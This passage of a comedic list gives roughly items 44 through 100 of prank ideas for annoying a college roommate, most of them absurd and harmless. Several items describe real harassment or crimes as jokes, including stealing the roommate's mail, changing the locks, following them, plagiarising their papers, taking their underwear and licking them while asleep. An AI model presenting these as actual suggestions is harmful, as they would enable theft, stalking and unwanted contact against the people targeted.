Shelve all your books with the spines facing the wall. Complain loudly that you can never find the book that you want. 45. Always flush the toilet three times. 46. Subsist entirely on pickles for a week. Vomit often. 47. Buy a copy of Frankie Yankovic's "Pennsylvania Polka," and play it at least 6 hours a day. If your roommate complains, explain that it's an assignment for your primitive cultures class. 48. Give him/her an allowance. 49. Listen to radio static. 50. Open your window shades before you go to sleep each night. Close them as soon as you wake up. 51. Cry a lot. 52. Send secret admirer notes on your roommate's blitzmail. 53. Clip your fingernails and toenails and keep them in a baggie. Leave the baggie near your computer and snack from it while studying. If he/she walks by, grab the bag close and eye him/her suspiciously. 54. Paste used kleenexes to his/her walls. 55. Whenever your roomate comes in from the shower, lower your eyes and giggle to yourself. 56. If you get in before your roomate, go to sleep in his/her bed. 57. Put pornos under his/her bed. Whenever someone comes to visit your roommate when they're not home, show them the magazines. 58. Whenever you go to sleep, start jumping on your bed . . . do so for a while, then jump really high and act like you hit your head on the ceiling. Crumple onto your bed and fake like you were knocked out . . . use this method to fall asleep every night for a month. 59. If your roommate goes away for a weekend, change the locks. 60. Whenever his/her parents call and ask for your roommate, breathe into the phone for 5 seconds then hang up. 61. Whenever he/she goes to shower, drop whatever you're doing, grab a towel, and go shower too. 62. Find out your roommate's post office box code. Open it and take his/her mail. Do this for one month. After that, send the mail to him/her by UPS. 63. Collect all of your pencil shavings and sprinkle them on the floor. 64. Create an imaginary cat for a pet. Talk to it every night, act like you're holding it, keep a litter box under your desk. After two weeks, say that your cat is missing. Put up signs in your dorm, blame your roommate. 65. Call safety & security whenever your roommate turns up his/her music. 66. Follow him/her around on weekends. 67. Sit on the floor and talk to the wall. 68. Whenever the phone rings, get up and answer the door. 69. Whenever someone knocks, answer the phone. 70. Take his/her underwear. Wear it. 71. Whenever your roommate is walking through the room, bump into him/her. 72. Stare at your roommate for five minutes out of every hour. Don't say anything, just stare. 73. Tell your roommate that someone called and said that it was really important but you can't remember who it was. 74. Let mice loose in his/her room. 75. Give each of your walls a different name. Whenever you can't answer a problem, ask each of your walls. Write down their responses, then ask your ceiling for the final answer. Complain to your roommate that you don't trust your ceiling. 76. Take your roommate's papers and hand them in as your own. 77. Skip to the bathroom. 78. Take all of your roommate's furniture and build a fort. Guard the fort for an entire weekend. 79. Gather up a garbage bag full of leaves and throw them in a pile in his/her room. Jump in them. Comment about the beautiful foliage. 80. When you walk into your room, turn off your lights. Turn them on when you leave. 81. Print up satanic signs and leave them in your room where he/she can find them. 82. Whenever you're on the phone and he/she walks in, hang up immediately without saying anything and crawl under your desk. Sit there for two minutes than call whoever it was back. 83. Insist on writing the entire lyrics to American Pie on your ceiling above your bed. Sing them every night before you go to bed. 84. Use a bible as Kleenex. Yell at your roommate if they say Jesus or God Damnit. 85. Burn incense. 86. Eat moths. 87. Buy Sea Monkeys and grow them. Name one after your roommate. Announce the next day that it died. Name another one after your roommate. The next day say that it died. Keep this up until they all die. 88. Collect Chia-Pets. 89. Refuse to communicate in anything but sign language. 90. Eat a bag of marshmallows before you go to bed. The next day, spray three bottles of whipped cream all over your floor. Say you got sick. 91. Wipe deodorant all over your roommate's walls. 92. If you know that he/she is in the room, come barging in out of breath. Ask if they saw a fat bald naked Tibetan man run through carrying a hundred dollar bill. Run back out swearing. 93. Leave apple cores on his/her bed. 94. Keep feces in your fridge. Complain that there is never anything to eat. 95. Piss in a jar and leave it by your bed. When your roommate isn't looking, replace it with a jar of apple juice. Wait until your roommate turns around. Drink it. 96. Don't ever flush. 97. Buy an inflatable doll. Sleep with it. 98. Hang stuffed animals with nooses from your ceiling. Whenever you walk by them mutter, "You shouldn't have done that to me." 99. Lick him/her while they are asleep. 100. Dress in drag. *******************************************************************************